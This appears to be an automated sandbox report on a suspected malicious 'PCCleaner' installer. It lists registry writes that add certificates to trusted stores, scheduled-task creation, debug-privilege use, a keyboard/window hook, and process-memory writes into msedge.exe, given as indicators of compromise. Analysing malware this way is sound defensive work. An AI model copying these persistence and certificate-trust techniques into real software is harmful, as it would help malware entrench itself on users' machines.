adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

PCCleaner.exemsedge.exemsedge.exeidentity_helper.exez9lPVDj9zZUU2uf3mPY.exe

pid	process
1060	PCCleaner.exe
1060	PCCleaner.exe
60	msedge.exe
60	msedge.exe
1060	PCCleaner.exe
1060	PCCleaner.exe
1544	msedge.exe
1544	msedge.exe
3960	identity_helper.exe
3960	identity_helper.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
2940	z9lPVDj9zZUU2uf3mPY.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

1544 msedge.exe
1544 msedge.exe
1544 msedge.exe
1544 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

z9lPVDj9zZUU2uf3mPY.exe

description	pid	process
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe
Token: SeDebugPrivilege	2940	z9lPVDj9zZUU2uf3mPY.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exeyRsXtHTgGrW6NY8ct.tmpvpn.tmp

pid	process
1544	msedge.exe
1544	msedge.exe
4572	yRsXtHTgGrW6NY8ct.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

z9lPVDj9zZUU2uf3mPY.exe

pid process

2940 z9lPVDj9zZUU2uf3mPY.exe

pid	process
2940	z9lPVDj9zZUU2uf3mPY.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

--d8kxdir.exeis-HJLGP.tmpPCCleaner.exemsedge.exe

description	pid	process	target process
PID 3972 wrote to memory of 1624	3972	--d8kxdir.exe	is-HJLGP.tmp
PID 3972 wrote to memory of 1624	3972	--d8kxdir.exe	is-HJLGP.tmp
PID 3972 wrote to memory of 1624	3972	--d8kxdir.exe	is-HJLGP.tmp
PID 1624 wrote to memory of 1856	1624	is-HJLGP.tmp	schtasks.exe
PID 1624 wrote to memory of 1856	1624	is-HJLGP.tmp	schtasks.exe
PID 1624 wrote to memory of 1856	1624	is-HJLGP.tmp	schtasks.exe
PID 1624 wrote to memory of 4672	1624	is-HJLGP.tmp	PCCleaner.exe
PID 1624 wrote to memory of 4672	1624	is-HJLGP.tmp	PCCleaner.exe
PID 1624 wrote to memory of 4672	1624	is-HJLGP.tmp	PCCleaner.exe
PID 1624 wrote to memory of 1980	1624	is-HJLGP.tmp	schtasks.exe
PID 1624 wrote to memory of 1980	1624	is-HJLGP.tmp	schtasks.exe
PID 1624 wrote to memory of 1980	1624	is-HJLGP.tmp	schtasks.exe
PID 1624 wrote to memory of 1060	1624	is-HJLGP.tmp	PCCleaner.exe
PID 1624 wrote to memory of 1060	1624	is-HJLGP.tmp	PCCleaner.exe
PID 1624 wrote to memory of 1060	1624	is-HJLGP.tmp	PCCleaner.exe
PID 1060 wrote to memory of 1544	1060	PCCleaner.exe	msedge.exe
PID 1060 wrote to memory of 1544	1060	PCCleaner.exe	msedge.exe
PID 1544 wrote to memory of 5000	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 5000	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 2304	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 60	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 60	1544	msedge.exe	msedge.exe
